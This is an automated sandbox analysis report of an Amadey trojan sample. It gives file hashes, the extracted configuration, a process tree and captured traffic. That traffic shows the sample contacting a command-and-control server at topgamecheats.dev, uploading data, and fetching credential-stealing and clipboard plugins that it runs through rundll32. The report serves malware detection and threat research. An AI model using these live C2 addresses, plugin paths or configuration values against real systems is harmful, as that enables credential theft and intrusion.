amadey | 1bd25c91b40f8a04e270b281fa8ab00c53357ef3a36dda3cc6704cd54c29635c

General

Target

3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe
Size

420KB
MD5

7b432411c12d3d0d31ecaf9011450e42
SHA1

968943d42ba1e8938989b6ed1884195c2285396f
SHA256

3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348
SHA512

6881c00ec9674a90b6390e18bcff67d0a5c837411f83955869a9cb2b62bccdedbc93561e70f6ddab7baaf908c8154de3a5bb982d0ee9ecc62363cc67d9cf563b
SSDEEP

6144:lfBwgfV+aXoGJR1xpppStlxu4qGilNZZDLxFLWj4+36o9:l3V+anFxZUq1NZJ9N8qu

Score

10^/10

amadey trojan

Malware Config

Extracted

Family

amadey

Version

4.18

Attributes

install_dir
154561dcbf
install_file
Dctooux.exe
strings_key
2cd47fa043c815e1a033c67832f3c6a5
url_paths
/j4Fvskd3/index.php

rc4.plain

1
810b84e2bfa3a9e2d0d81a3d2ea89e46

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Blocklisted process makes network request 1 IoCs

flow	pid	Process
10	1620	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
2516	Dctooux.exe

Loads dropped DLL 6 IoCs

pid	Process
1612	3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe
1612	3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe
1620	rundll32.exe
1620	rundll32.exe
1620	rundll32.exe
1620	rundll32.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Dctooux.job	3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1612	3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 2516	1612	3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe	28
PID 1612 wrote to memory of 2516	1612	3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe	28
PID 1612 wrote to memory of 2516	1612	3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe	28
PID 1612 wrote to memory of 2516	1612	3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe	28
PID 2516 wrote to memory of 1048	2516	Dctooux.exe	32
PID 2516 wrote to memory of 1048	2516	Dctooux.exe	32
PID 2516 wrote to memory of 1048	2516	Dctooux.exe	32
PID 2516 wrote to memory of 1048	2516	Dctooux.exe	32
PID 2516 wrote to memory of 1048	2516	Dctooux.exe	32
PID 2516 wrote to memory of 1048	2516	Dctooux.exe	32
PID 2516 wrote to memory of 1048	2516	Dctooux.exe	32
PID 1048 wrote to memory of 1624	1048	rundll32.exe	33
PID 1048 wrote to memory of 1624	1048	rundll32.exe	33
PID 1048 wrote to memory of 1624	1048	rundll32.exe	33
PID 1048 wrote to memory of 1624	1048	rundll32.exe	33
PID 2516 wrote to memory of 1620	2516	Dctooux.exe	34
PID 2516 wrote to memory of 1620	2516	Dctooux.exe	34
PID 2516 wrote to memory of 1620	2516	Dctooux.exe	34
PID 2516 wrote to memory of 1620	2516	Dctooux.exe	34
PID 2516 wrote to memory of 1620	2516	Dctooux.exe	34
PID 2516 wrote to memory of 1620	2516	Dctooux.exe	34
PID 2516 wrote to memory of 1620	2516	Dctooux.exe	34

C:\Users\Admin\AppData\Local\Temp\3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe
"C:\Users\Admin\AppData\Local\Temp\3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1612
- C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
  "C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
      4⤵
      PID:1624
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:1620

Network

DNS

topgamecheats.dev

rundll32.exe

Remote address:

8.8.8.8:53

Request

topgamecheats.dev

IN A

Response

topgamecheats.dev

IN A

93.123.39.96
POST

http://topgamecheats.dev/j4Fvskd3/index.php

Dctooux.exe

Remote address:

93.123.39.96:80

Request

POST /j4Fvskd3/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topgamecheats.dev
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

content-type: text/html; charset=UTF-8
refresh: 0; url = Login.php
transfer-encoding: chunked
date: Wed, 17 Apr 2024 13:42:48 GMT
server: LiteSpeed
connection: Keep-Alive
POST

http://topgamecheats.dev/j4Fvskd3/index.php

Dctooux.exe

Remote address:

93.123.39.96:80

Request

POST /j4Fvskd3/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topgamecheats.dev
Content-Length: 156
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Wed, 17 Apr 2024 13:42:48 GMT
server: LiteSpeed
connection: Keep-Alive
POST

http://topgamecheats.dev/j4Fvskd3/index.php?scr=1

Dctooux.exe

Remote address:

93.123.39.96:80

Request

POST /j4Fvskd3/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NjkxNTk=
Host: topgamecheats.dev
Content-Length: 69311
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Wed, 17 Apr 2024 13:42:51 GMT
server: LiteSpeed
connection: Keep-Alive
GET

http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll

Dctooux.exe

Remote address:

93.123.39.96:80

Request

GET /j4Fvskd3/Plugins/cred64.dll HTTP/1.1
Host: topgamecheats.dev

Response

HTTP/1.1 200 OK

content-type: application/octet-stream
last-modified: Mon, 11 Mar 2024 21:14:27 GMT
etag: "65ef7433-139e00"
accept-ranges: bytes
content-length: 1285632
date: Wed, 17 Apr 2024 13:42:57 GMT
server: LiteSpeed
connection: Keep-Alive
GET

http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll

Dctooux.exe

Remote address:

93.123.39.96:80

Request

GET /j4Fvskd3/Plugins/clip64.dll HTTP/1.1
Host: topgamecheats.dev

Response

HTTP/1.1 200 OK

content-type: application/octet-stream
last-modified: Mon, 11 Mar 2024 21:14:32 GMT
etag: "65ef7438-1b600"
accept-ranges: bytes
content-length: 112128
date: Wed, 17 Apr 2024 13:44:25 GMT
server: LiteSpeed
connection: Keep-Alive
POST

http://topgamecheats.dev/j4Fvskd3/index.php

rundll32.exe

Remote address:

93.123.39.96:80

Request

POST /j4Fvskd3/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: topgamecheats.dev
Content-Length: 5
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Wed, 17 Apr 2024 13:44:40 GMT
server: LiteSpeed
connection: Keep-Alive

93.123.39.96:80

http://topgamecheats.dev/j4Fvskd3/index.php

http

Dctooux.exe

926 B
723 B
10
8

HTTP Request

POST http://topgamecheats.dev/j4Fvskd3/index.php

HTTP Response

200

HTTP Request

POST http://topgamecheats.dev/j4Fvskd3/index.php

HTTP Response

200
93.123.39.96:80

http://topgamecheats.dev/j4Fvskd3/index.php?scr=1

http

Dctooux.exe

327.5kB
45.3kB
5575
794

HTTP Request

POST http://topgamecheats.dev/j4Fvskd3/index.php?scr=1

HTTP Response

200
93.123.39.96:80

http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll

http

Dctooux.exe

2.6kB
65.7kB
50
50

HTTP Request

GET http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll

HTTP Response

200
93.123.39.96:80

http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll

http

Dctooux.exe

4.0kB
119.5kB
76
90

HTTP Request

GET http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll

HTTP Response

200
93.123.39.96:80

http://topgamecheats.dev/j4Fvskd3/index.php

http

rundll32.exe

592 B
964 B
9
6

HTTP Request

POST http://topgamecheats.dev/j4Fvskd3/index.php

HTTP Response

200

8.8.8.8:53

topgamecheats.dev

dns

rundll32.exe

63 B
79 B
1
1

DNS Request

topgamecheats.dev

DNS Response

93.123.39.96

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\309405411416

Filesize
67KB

MD5
7a2c6635009509cddbdbaa73ec4763c1

SHA1
3366d6c7f901e3096f9c5353d8af4129b81a56f9

SHA256
8b0ce0a2f2bc1a295f4a76f327976cab99d6fc4ebc448bfb3dd8f869290150a2

SHA512
9f99998eeed39c3c14fc33b1b651e6c242288f5860e3f09bbf945d116675aea3e15f15a2e771517e3b74da05899183abe1caf538359e42e5853a545e6e53ad41

Download Submit
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll

Filesize
109KB

MD5
ca684dc5ebed4381701a39f1cc3a0fb2

SHA1
8c4a375aa583bd1c705597a7f45fd18934276770

SHA256
b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2

SHA512
8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510

Download Submit
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

Filesize
48KB

MD5
f5ac06f8ba1942fd027a3f2f12f22083

SHA1
7436868031775a7da6590b2d42247599fc2e167c

SHA256
a4ae3b4b3a8eb9f8bcae327ee62014485889093cbf0b690f7207c313b5c4e7c7

SHA512
7e9e9b73b7482563d75fa823cca3f8f377a61429cded1da1abbb61922a4a8888d21ccb39712e4a74b22569ced5350f2a6702ae36e6c8c1f3177d3ef005b0a7db

Download Submit
\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

Filesize
420KB

MD5
7b432411c12d3d0d31ecaf9011450e42

SHA1
968943d42ba1e8938989b6ed1884195c2285396f

SHA256
3fa8f8c64210e0949184380e438a86e4d8e597c7b63cd8591232083b97fa5348

SHA512
6881c00ec9674a90b6390e18bcff67d0a5c837411f83955869a9cb2b62bccdedbc93561e70f6ddab7baaf908c8154de3a5bb982d0ee9ecc62363cc67d9cf563b

Download Submit
memory/1612-21-0x0000000000F80000-0x0000000001080000-memory.dmp

Filesize
1024KB

Download
memory/1612-3-0x0000000000400000-0x0000000000B12000-memory.dmp

Filesize
7.1MB

Download
memory/1612-20-0x0000000000220000-0x000000000028F000-memory.dmp

Filesize
444KB

Download
memory/1612-2-0x0000000000220000-0x000000000028F000-memory.dmp

Filesize
444KB

Download
memory/1612-1-0x0000000000F80000-0x0000000001080000-memory.dmp

Filesize
1024KB

Download
memory/1612-17-0x0000000000400000-0x0000000000B12000-memory.dmp

Filesize
7.1MB

Download
memory/1612-5-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download
memory/2516-33-0x0000000000400000-0x0000000000B12000-memory.dmp

Filesize
7.1MB

Download
memory/2516-34-0x0000000000400000-0x0000000000B12000-memory.dmp

Filesize
7.1MB

Download
memory/2516-35-0x0000000000BC0000-0x0000000000CC0000-memory.dmp

Filesize
1024KB

Download
memory/2516-22-0x0000000000400000-0x0000000000B12000-memory.dmp

Filesize
7.1MB

Download
memory/2516-51-0x0000000000400000-0x0000000000B12000-memory.dmp

Filesize
7.1MB

Download
memory/2516-19-0x0000000000BC0000-0x0000000000CC0000-memory.dmp

Filesize
1024KB

Download
memory/2516-67-0x0000000000400000-0x0000000000B12000-memory.dmp

Filesize
7.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.